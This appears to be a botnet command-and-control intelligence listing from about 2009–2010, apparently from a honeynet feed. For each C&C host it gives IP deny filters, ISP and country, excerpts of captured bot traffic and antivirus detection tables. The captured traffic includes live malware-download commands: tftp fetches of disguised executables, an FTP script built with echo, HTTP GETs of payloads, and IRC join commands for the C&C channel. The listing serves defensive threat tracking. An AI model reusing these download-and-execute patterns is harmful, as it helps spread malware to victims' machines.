  • Client: JOIN #.has hs
  • Server: PONG :irc.priv8net.com
  • Client: JOIN #.has hs
  • Server: PONG :irc.priv8net.com
  • Client: JOIN #.has hs
  • Server: PONG :irc.priv8net.com
  • Client: JOIN #.has hs
  • Server: PONG :irc.priv8net.com
  • Client: JOIN #.has hs
  • Server: PONG :irc.priv8net.com
  • Client: JOIN #.has hs
  • Server: PONG :irc.priv8net.com
  • Client: JOIN #.has hs

more....

BotClient Antivirus Diagnoses
AhnLab-V3MISSED
AntiVirTRSpy.Games.A
AuthentiumSTZ_like!Generic
AvastMISSED
AVGPolyCrypt
BitDefenderMISSED
CAT-QuickHealMISSED
ClamAVMISSED
DrWebMISSED
eSafeMISSED
eTrust-VetMISSED
EwidoMISSED
FileAdvisorMISSED
FortinetMISSED
F-ProtSTZ_like!Generic
F-SecureSuspicious_Malware!Gemini
IkarusVirut.n
KasperskyMISSED
McAfeeMISSED
MicrosoftMISSED
NOD32v2MISSED
NormanMISSED
PandaMISSED
Prevx1MISSED
RisingMISSED
SophosMISSED
SunbeltMISSED
SymantecMISSED
TheHackerMISSED
TrendMicroMISSED
VBA32MISSED
VirusBusterMISSED
Webwasher
Gateway
Spy.Games.A
Priority 2 TCP Ports 80 Filter deny ip host 68.178.232.100 any log ! 2 infects 12/13/09 to 01/22/10 secureserver.net ISP godaddy.com inc
Clients 2 united states Activity Domain secureserver.net
Chatter Example
  • Server: GET / HTTP/1.1Accept: */*Accept-Language: en-usAccept-Encoding:...
  • Server: GET /?245e7ff8 HTTP/1.1Accept: */*Accept-Language:...
  • Server: GET / HTTP/1.1Accept: */*Accept-Language: en-usAccept-Encoding:...
  • Server: GET /sd?s=95308&f=1 HTTP/1.1Accept: */*Referer:...
  • Server: GET /sd?s=95308&f=1&C=1 HTTP/1.1Accept: */*Referer:...
  • Server: GET /apps/domainpark/show_afd_ads.js HTTP/1.1Accept: */*Referer:...
  • Server: GET /images/hdr_parked_ppc_4.png HTTP/1.1Accept: */*Referer:...
  • Server: GET /images/hdr_parked_ppc_4.png?245e7ff8 HTTP/1.1Accept:...
  • Server: GET /images/061703/spc_trans.gif HTTP/1.1Accept: */*Referer:...
  • Server: GET /images/hdr_parked_ppc_4.png HTTP/1.1Accept: */*Referer:...
  • Server: GET /images/img_gdlogo.png HTTP/1.1Accept: */*Referer:...
  • Server: GET /images/mrkt_250x80_4.gif HTTP/1.1Accept: */*Referer:...
  • Server: GET /images/tp250x80_7.gif HTTP/1.1Accept: */*Referer:...
  • Server: GET /images/img_saletag.gif HTTP/1.1Accept: */*Referer:...
  • Server: GET /images/img_parkedfreetext_b.png HTTP/1.1Accept: */*Referer:...
  • Server: GET /images/but_search.png HTTP/1.1Accept: */*Referer:...
  • Server: GET /images/tp468x60_7.gif HTTP/1.1Accept: */*Referer:...
  • Server: GET /images/ad_ppc_prodadv.gif HTTP/1.1Accept: */*Referer:...
  • Server: GET /images/ban_199_3.gif HTTP/1.1Accept: */*Referer:...
  • Server: GET /images/061703/but_go_orange_green.gif HTTP/1.1Accept:...
  • Server: GET /images/img_orangearrows.png HTTP/1.1Accept: */*Referer:...
  • Server: GET /images/dbs_2.gif HTTP/1.1Accept: */*Referer:...
  • Server: GET /images/log_me.gif HTTP/1.1Accept: */*Referer:...
  • Server: GET /images/ad_ppc_hosting.gif HTTP/1.1Accept: */*Referer:...
  • Server: GET /images/ad_ppc_biz3.gif HTTP/1.1Accept: */*Referer:...
  • Server: GET /images/log_icann.png HTTP/1.1Accept: */*Referer:...
  • Server: GET / HTTP/1.1Accept: */*Referer:...
  • Server: GET /images/img_footertext2.png HTTP/1.1Accept: */*Referer:...
  • Server: GET /images/bul_blacksquare.png HTTP/1.1Accept: */*Referer:...
  • Server: GET /images/bul_bluesquare.png HTTP/1.1Accept: */*Referer:...
  • Server: GET /images/ad_ppc_wst.gif HTTP/1.1Accept: */*Referer:...
  • Server: GET /images/ad_ppc_gdauctions.gif HTTP/1.1Accept: */*Referer:...
  • Server: GET /assets/spc_trans.gif HTTP/1.1Accept: */*Referer:...
  • Server: GET /aaa/help/hlp_toplft.gif HTTP/1.1Accept: */*Referer:...
  • Server: GET /aaa/help/hlp_toprt.gif HTTP/1.1Accept: */*Referer:...
  • Server: GET /aaa/help/hlp_botlft.gif HTTP/1.1Accept: */*Referer:...
  • Server: GET /aaa/help/hlp_botrt.gif HTTP/1.1Accept: */*Referer:...

more....

BotClient Antivirus Diagnoses
AhnLab-V3MISSED
AntiVirMISSED
AuthentiumMISSED
AvastMISSED
AVGMISSED
BitDefenderMISSED
CAT-QuickHealMISSED
ClamAVMISSED
DrWebMISSED
eSafeMISSED
eTrust-VetMISSED
EwidoMISSED
FileAdvisorMISSED
FortinetMISSED
F-ProtMISSED
F-SecureMISSED
IkarusMISSED
KasperskyMISSED
McAfeeMISSED
MicrosoftMISSED
NOD32v2MISSED
NormanMISSED
PandaMISSED
Prevx1MISSED
RisingMISSED
SophosMISSED
SunbeltMISSED
SymantecMISSED
TheHackerMISSED
TrendMicroMISSED
VBA32MISSED
VirusBusterMISSED
Webwasher
Gateway
MISSED
Priority 2 TCP Ports 3305 Filter deny ip host 89.208.33.88 any log ! 2 infects 11/15/09 to 11/18/09 di-net.ru ISP hosting and colocation services
Clients 2 russian federation Activity Domain di-net.ru
Chatter Example
  • Client: dir dllcache\\tftpd.exe
  • Client: tftp -i 67.55.178.248 get svchost.exe wins\\SVCHOST.EXE
  • Client: tftp -i 67.55.178.248 get dllhost.exe wins\\DLLHOST.EXE
  • Client: PASS secretpass
  • Client: NICK P|i5vvaj0awUSER mlj7x67ke * 0 :USA|XP|867
  • Server: :hub.14020.net 001 P|i5vvaj0aw...
  • Client: USERHOST P|i5vvaj0aw
  • Server: :hub.14020.net 302 P|i5vvaj0aw...
  • Client: USERHOST P|i5vvaj0awMODE P|i5vvaj0aw JOIN #mm RSA
  • Client: PRIVMSG #mm...

more....

BotClient Antivirus Diagnoses
AhnLab-V3Virut.B
AntiVirVirut.AX
AuthentiumVirut.7116
Avast_Virtob
AVGVirut
BitDefenderVirtob.8.Gen
CAT-QuickHealVirut.Z
ClamAVVirut-54
DrWebHLLW.Piabot.4
eSafeMISSED
eTrust-VetVirut.7115
EwidoMISSED
FileAdvisorMISSED
FortinetVirut.AV
F-ProtVirut.7116
F-SecureVirtob.8.Gen
IkarusKolabc
KasperskyVirut.av
McAfeeVirut.gen.a
MicrosoftVirut.AC
NOD32v2MISSED
NormanVirut.AG
PandaVirutas.FG
Prevx1MISSED
RisingVirut.an
SophosVirut-W
SunbeltMISSED
SymantecVirut.W
TheHackerVirut.av
TrendMicroPE_VIRUT.AV
VBA32Virut.2
VirusBusterVirut.Gen.4
Webwasher
Gateway
MISSED
Priority 2 TCP Ports 2569 3938 Filter deny ip host 89.149.227.51 any log ! 2 infects 10/16/09 to 10/17/09 internetserviceteam.com ISP netdirekt e.k
Clients 2 germany Activity Domain internetserviceteam.com
Chatter Example
  • Client: dir dllcache\\tftpd.exe
  • Client: tftp -i 113.253.112.208 get svchost.exe wins\\SVCHOST.EXE
  • Client: tftp -i 113.253.112.208 get dllhost.exe wins\\DLLHOST.EXE
  • Client: USER smpbcb smpbcb smpbcb :gywmthsyspraopyh
  • Client: NICK tiHIjEan
  • Server: :irc.foonet.com NOTICE AUTH :*** Looking up your hostname...
  • Server: :irc.foonet.com NOTICE AUTH :*** Couldn\\'t resolve your...
  • Client: MODE tiHIjEan +xi
  • Server: File is missing:tiHIjEan MODE tiHIjEan :+iwx
  • Client: JOIN ##russia## USERHOST tiHIjEan
  • Client: MODE ##russia## +smntu
  • Client: GET /dive.exe HTTP/1.0Host: 89.149.227.51

more....

BotClient Antivirus Diagnoses
AhnLab-V3MISSED
AntiVirPalevo.jur.20
AuthentiumMISSED
Avast_Trojan-gen
AVGDropper.Generic.AYVO
BitDefenderGeneric.2518038
CAT-QuickHealAgent.ATV
ClamAVMISSED
DrWebIRC.Sdbot.5190
eSafeTrojanProxyRan
eTrust-VetMISSED
EwidoMISSED
FileAdvisorMISSED
FortinetPossibleThreat
F-ProtMISSED
F-SecureMISSED
IkarusPushbot
KasperskyP2P-Palevo.jur
McAfeeAutorun.aah
MicrosoftMalagent
NOD32v2MISSED
NormanMISSED
PandaMISSED
Prevx1MISSED
RisingMISSED
SophosMalGeneric-A
SunbeltMISSED
SymantecIRCBot
TheHackerMISSED
TrendMicroTROJ_AGENT.ICZZ
VBA32Kolab.ear
VirusBusterP2P.Palevo.EAN
Webwasher
Gateway
MISSED
Priority 1 TCP Ports 18067 Filter deny ip host 204.45.13.42 any log ! 1 infects 01/06/10 to 01/06/10 - ISP -
Clients 1 - Activity Domain -
Chatter Example
  • Client: USeR l l l l
  • Client: NiCK l5-00029f63
  • Client: PoNG :8BC55D68
  • Server: :a 001 l5-00029f63 :l5-00029f63 MODE l5-00029f63 :+i
  • Client: USeRHOST l5-00029f63
  • Client: JOiN #l5t3 dlrowymx0ri
  • Server: :l5-00029f63!l@192.168.1.160 JOIN :#l5t3

more....

BotClient Antivirus Diagnoses
AhnLab-V3Win-Small.6694
AntiVirBDSSmall.EO
AuthentiumBAE
Avast_Trojano-1124
AVGSmall.27.AQ
BitDefenderGeneric.24785
CAT-QuickHealSmall.eo
ClamAVSdBot-730
DrWebRestrict
eSafeStration
eTrust-VetCuebot.E
EwidoMISSED
FileAdvisorMISSED
FortinetRPC.WALLZ!worm
F-ProtBAE
F-SecureSmall.eo
IkarusIM-Opanki.O
KasperskySmall.eo
McAfeeSdbot.gen
MicrosoftSmall.BX
NOD32v2MISSED
NormanSuspicious_M.gen
PandaBckSmall.HI
Prevx1MISSED
RisingMocbot.a
SophosHwbot-A
SunbeltMISSED
SymantecTrojan
TheHackerBackdoorSmall.eo
TrendMicroBKDR_SDBOT.GAA
VBA32Small.eo
VirusBusterSmall.AEE
Webwasher
Gateway
MISSED
Priority 1 TCP Ports 6667 Filter deny ip host 38.97.225.135 any log ! 1 infects 10/29/09 to 10/29/09 cogentco.com ISP psinet inc
Clients 1 united states Activity Domain cogentco.com
Chatter Example
  • Client: GET /x.exe HTTP/1.0User-Agent: Mozilla/4.0Host: 213.16.201.41:7314
  • Server: GET /x.exe HTTP/1.0User-Agent: Mozilla/4.0Host: 213.16.201.41:7314

more....

BotClient Antivirus Diagnoses
AhnLab-V3Parite
AntiVirParite
AuthentiumKorgo.V
Avast_Parite
AVGKorgo.A
BitDefenderPadobot.BV.Dam
CAT-QuickHealPerite.B
ClamAVPadobot.M
DrWebLsabot
eSafe_Parite_B
eTrust-VetPinfi.A
EwidoMISSED
FileAdvisorMISSED
FortinetParite.B
F-ProtKorgo.V
F-SecurePadobot.BV.Dam
IkarusPadobot.M
KasperskyPadobot.m
McAfeePate.b
MicrosoftKorgo.V
NOD32v2MISSED
NormanKorgo.V
PandaKorgo.U.worm
Prevx1MISSED
RisingParite.b
SophosParite-B
SunbeltMISSED
SymantecPinfi
TheHackerPate.B
TrendMicroPE_PARITE.A
VBA32Parite.B
VirusBusterPadobot.D
Webwasher
Gateway
MISSED
Priority 1 TCP Ports 16667 Filter deny ip host 92.243.19.221 any log ! 1 infects 01/18/10 to 01/18/10 ghst.net ISP gandi dedicated hosting servers
Clients 1 france Activity Domain ghst.net
Chatter Example
  • Client: NICK [USA]XP-SP0[00]1198USER glplur 0 0...
  • Server: :MBoY.Org NOTICE AUTH :*** Looking up your hostname...
  • Server: :MBoY.Org NOTICE AUTH :*** Couldn\\'t resolve your hostname;...
  • Server: Org 422 [USA]XP-SP0[00]1198 :MOTD File is...
  • Client: USERHOST [USA]XP-SP0[00]1198
  • Client: MODE [USA]XP-SP0[00]1198 -x+iJOIN #l# lamUSERHOST...
  • Server: PONG :MBoY.Org
  • Server: :|!X@admin.com PRIVMSG #l# :.l lam -s
  • Server: :|!X@admin.com PRIVMSG #l# :.l lam -s
  • Server: :|!X@admin.com PRIVMSG #l# :.g3t...
  • Client: GET /rshadel/mxx.exe HTTP/1.0User-Agent: Mozilla/4.0...
  • Server: GET /rshadel/mxx.exe HTTP/1.0User-Agent: Mozilla/4.0...
  • Server: :|!X@admin.com PRIVMSG #l# :.g3t...
  • Server: GET /error/404.phtml HTTP/1.0User-Agent: Mozilla/4.0...
  • Server: + \\google-analytics.com/ga.js\\'...
  • Server: :|!X@admin.com PRIVMSG #l# :.g3t...
  • Server: GET /g0th1c/mxx.exe HTTP/1.0User-Agent: Mozilla/4.0...
  • Server: GET /g0th1c/mxx.exe HTTP/1.0User-Agent: Mozilla/4.0...
  • Server: GET /g0th1c/mxx.exe HTTP/1.0User-Agent: Mozilla/4.0...
  • Server: GET /g0th1c/mxx.exe HTTP/1.0User-Agent: Mozilla/4.0...
  • Server: GET /g0th1c/mxx.exe HTTP/1.0User-Agent: Mozilla/4.0...
  • Server: GET /g0th1c/mxx.exe HTTP/1.0User-Agent: Mozilla/4.0...
  • Server: :|!X@admin.com PRIVMSG #l# :.g3t...
  • Server: :MBoY.Org 404 [USA]XP-SP0[00]1198 #l# :You must have a registered...
  • Server: :MBoY.Org 404 [USA]XP-SP0[00]1198 #l# :You must have a registered...
  • Server: :MBoY.Org 404 [USA]XP-SP0[00]1198 #l# :You must have a registered...
  • Server: :MBoY.Org 404 [USA]XP-SP0[00]1198 #l# :You must have a registered...
  • Server: :MBoY.Org 404 [USA]XP-SP0[00]1198 #l# :You must have a registered...
  • Server: :MBoY.Org 404 [USA]XP-SP0[00]1198 #l# :You must have a registered...
  • Server: :MBoY.Org 404 [USA]XP-SP0[00]1198 #l# :You must have a registered...
  • Server: PONG :MBoY.Org
  • Server: :|!X@admin.com MODE #l# +m
  • Server: :|!X@admin.com MODE #l# +m
  • Server: PONG :MBoY.Org
  • Server: PONG :MBoY.Org
  • Server: :|!X@admin.com PRIVMSG #l# :.l lam -s
  • Server: :|!X@admin.com PRIVMSG #l# :.g3t...

more....

BotClient Antivirus Diagnoses
AhnLab-V3MISSED
AntiVirMISSED
AuthentiumMISSED
AvastMISSED
AVGMISSED
BitDefenderMISSED
CAT-QuickHealMISSED
ClamAVMISSED
DrWebMISSED
eSafeMISSED
eTrust-VetMISSED
EwidoMISSED
FileAdvisorMISSED
FortinetMISSED
F-ProtMISSED
F-SecureMISSED
IkarusMISSED
KasperskyMISSED
McAfeeMISSED
MicrosoftMISSED
NOD32v2MISSED
NormanMISSED
PandaMISSED
Prevx1MISSED
RisingMISSED
SophosMISSED
SunbeltMISSED
SymantecMISSED
TheHackerMISSED
TrendMicroMISSED
VBA32MISSED
VirusBusterMISSED
Webwasher
Gateway
MISSED
Priority 1 TCP Ports 3308 Filter deny ip host 217.30.180.76 any log ! 1 infects 10/15/09 to 10/15/09 nebula.fi ISP nebula oy. web hosting pri-dns and streaming
Clients 1 finland Activity Domain nebula.fi
Chatter Example
  • Client: dir dllcache\\tftpd.exe
  • Client: tftp -i 125.4.228.60 get svchost.exe wins\\SVCHOST.EXE
  • Client: tftp -i 125.4.228.60 get dllhost.exe wins\\DLLHOST.EXE
  • Client: PASS secretpass
  • Client: NICK P|m80s5khyjUSER e5idmiq5g * 0 :USA|2K|865
  • Server: :hub.82.net 001 P|m80s5khyj...
  • Client: USERHOST P|m80s5khyj
  • Server: :hub.82.net 302 P|m80s5khyj :P|m80s5khyj=+e5idmiq5g@192.168.1.209
  • Client: USERHOST P|m80s5khyjMODE P|m80s5khyj JOIN #mm RSA
  • Client: PRIVMSG #mm...

more....

BotClient Antivirus Diagnoses
AhnLab-V3Virut.B
AntiVirVirut.AX
AuthentiumVirut.7116
Avast_Virtob
AVGVirut
BitDefenderVirtob.8.Gen
CAT-QuickHealVirut.Z
ClamAVVirut-54
DrWebVirut.30
eSafeMISSED
eTrust-VetVirut.7115
EwidoMISSED
FileAdvisorMISSED
FortinetVirut.AV
F-ProtVirut.7116
F-SecureVirut.av
IkarusKolabc
KasperskyVirut.av
McAfeeVirut.gen.a
MicrosoftVirut.AC
NOD32v2MISSED
NormanVirut.AG
PandaVirutas.FG
Prevx1MISSED
RisingVirut.an
SophosVirut-W
SunbeltMISSED
SymantecVirut.W
TheHackerVirut.av
TrendMicroPE_VIRUT.AV
VBA32Virut.2
VirusBusterVirut.Gen.4
Webwasher
Gateway
MISSED
Priority 1 TCP Ports 80 216 Filter deny ip host 97.74.144.31 any log ! 1 infects 10/14/09 to 10/14/09 jws.com ISP godaddy.com inc
Clients 1 united states Activity Domain jws.com
Chatter Example
  • Server: echo off&echo open 91.66.198.112 1023>>cmd.ftp&echo...
  • Client: USER anonymous
  • Client: PASS bin
  • Server: RETR 12394_upload.exe
  • Client: GET /images/logos.gif?51dff=2347513 HTTP/1.0User-Agent: KUKU...
  • Server: GET /result?52552 HTTP/1.0User-Agent: Opera/9.00 (Windows NT 5.1;...
  • Server: GET /h2/mainh.gif?528fb=338171 HTTP/1.0User-Agent: KUKU v5.06exp...
  • Server: GET /images/logos.gif?531c5=680842 HTTP/1.0User-Agent: KUKU...
  • Server: GET /?342546 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE...
  • Server: GET /h2/?s=938 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE...
  • Server: GET / HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 6.0;...
  • Server: GET /home_imag/mainf.gif?53e68=1718280 HTTP/1.0User-Agent: KUKU...
  • Server: GET /logos.gif?53fee=2752368 HTTP/1.0User-Agent: KUKU v5.06exp...
  • Server: GET /images/logos.gif?54bf5=1041375 HTTP/1.0User-Agent: KUKU...
  • Server: GET /images/mainf.gif?54df8=1738200 HTTP/1.0User-Agent: KUKU...
  • Server: GET /images/logos.gif?54ea4=3478120 HTTP/1.0User-Agent: KUKU...
  • Server: GET /images/logos.gif?55aaa=2105340 HTTP/1.0User-Agent: KUKU...
  • Server: GET /utest/?jutr=31444&oo=2&57835=264973&ra=0 HTTP/1.0User-Agent:...
  • Server: GET /test/gewtghywa.dat HTTP/1.0X-Forwarded-For:...

more....

BotClient Antivirus Diagnoses
AhnLab-V3Kashu.B
AntiVirSality.Y
AuthentiumSasser.E
Avast_Sality
AVGI-Sasser.E
BitDefenderGeneric.24440
CAT-QuickHealSality.R
ClamAVSasser.H
DrWebSector.5
eSafeMISSED
eTrust-VetSality.AA
EwidoMISSED
FileAdvisorMISSED
FortinetSality.AA
F-ProtSasser.E
F-SecureSasser.D
IkarusEmail-Plexus.E
KasperskySality.aa
McAfeeSality.gen
MicrosoftSality.AM
NOD32v2MISSED
NormanSasser.E
PandaSasser.E.worm
Prevx1MISSED
RisingKUKU.GEN
SophosSality-AM
SunbeltMISSED
SymantecSality.AE
TheHackerSality.gen
TrendMicroPE_SALITY.EN
VBA32Sality.kaka
VirusBusterSasser.E
Webwasher
Gateway
MISSED
Priority 1 TCP Ports 80 Filter deny ip host 194.67.57.20 any log ! 1 infects 09/03/09 to 09/03/09 mail.ru ISP sovintel-msk-netbridge-ervices-net
Clients 1 russian federation Activity Domain mail.ru
Chatter Example
  • Client: GET /lsd HTTP/1.0User-Agent: bHost: 66.220.226.83:50929
  • Server: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0;...

more....

BotClient Antivirus Diagnoses
AhnLab-V3MISSED
AntiVirTRDropper.Gen
AuthentiumHeuristic-MUP!Eldorado
Avast_Padobot-D@UPX
AVGMISSED
BitDefenderGeneric.69904
CAT-QuickHealMISSED
ClamAVMISSED
DrWebMISSED
eSafeWormPoxdar.A.D
eTrust-VetMISSED
EwidoMISSED
FileAdvisorMISSED
FortinetMISSED
F-ProtHeuristic-MUP!Eldorado
F-SecureMISSED
IkarusMISSED
KasperskyMISSED
McAfeeMISSED
MicrosoftPoxdar.A
NOD32v2MISSED
NormanMISSED
PandaMISSED
Prevx1MISSED
RisingMISSED
SophosMalHckPk-E
SunbeltMISSED
SymantecPoxdar
TheHackerMISSED
TrendMicroPAK_Generic.001
VBA32MISSED
VirusBusterMISSED
Webwasher
Gateway
MISSED
Priority 1 TCP Ports 3305 Filter deny ip host 203.146.251.62 any log ! 1 infects 11/03/09 to 11/03/09 csloxinfo.net ISP reassign to paidc idc suapha-idc customer
Clients 1 thailand Activity Domain csloxinfo.net
Chatter Example
  • Client: PASS secretpass
  • Client: NICK P|ot4z09bbzUSER lnv4ddgy3 * 0 :USA|XP|651
  • Server: :hub.62014.net 001 P|ot4z09bbz...
  • Client: USERHOST P|ot4z09bbz
  • Server: :hub.62014.net 302 P|ot4z09bbz...
  • Client: USERHOST P|ot4z09bbzMODE P|ot4z09bbz JOIN #mm RSA
  • Client: PRIVMSG #mm...

more....

BotClient Antivirus Diagnoses
AhnLab-V3MISSED
AntiVirTRDropper.Gen
AuthentiumThreat-HLLIYE!Eldorado
Avast_DCom-F
AVGHeur
BitDefenderPacker.Yoda.A
CAT-QuickHealMISSED
ClamAVMISSED
DrWebHLLW.Piabot.4
eSafeMISSED
eTrust-VetMISSED
EwidoMISSED
FileAdvisorMISSED
FortinetMISSED
F-ProtThreat-HLLIYE!Eldorado
F-SecureMISSED
IkarusExploit.MS06040
KasperskyHeur.Generic
McAfeeMISSED
MicrosoftExploit_MS06040.gen
NOD32v2MISSED
NormanMISSED
PandaTrjCI.A
Prevx1MISSED
RisingMISSED
SophosMalPacker
SunbeltMISSED
SymantecMISSED
TheHackerMISSED
TrendMicroPAK_Generic.001
VBA32MISSED
VirusBusterPackedYoda
Webwasher
Gateway
MISSED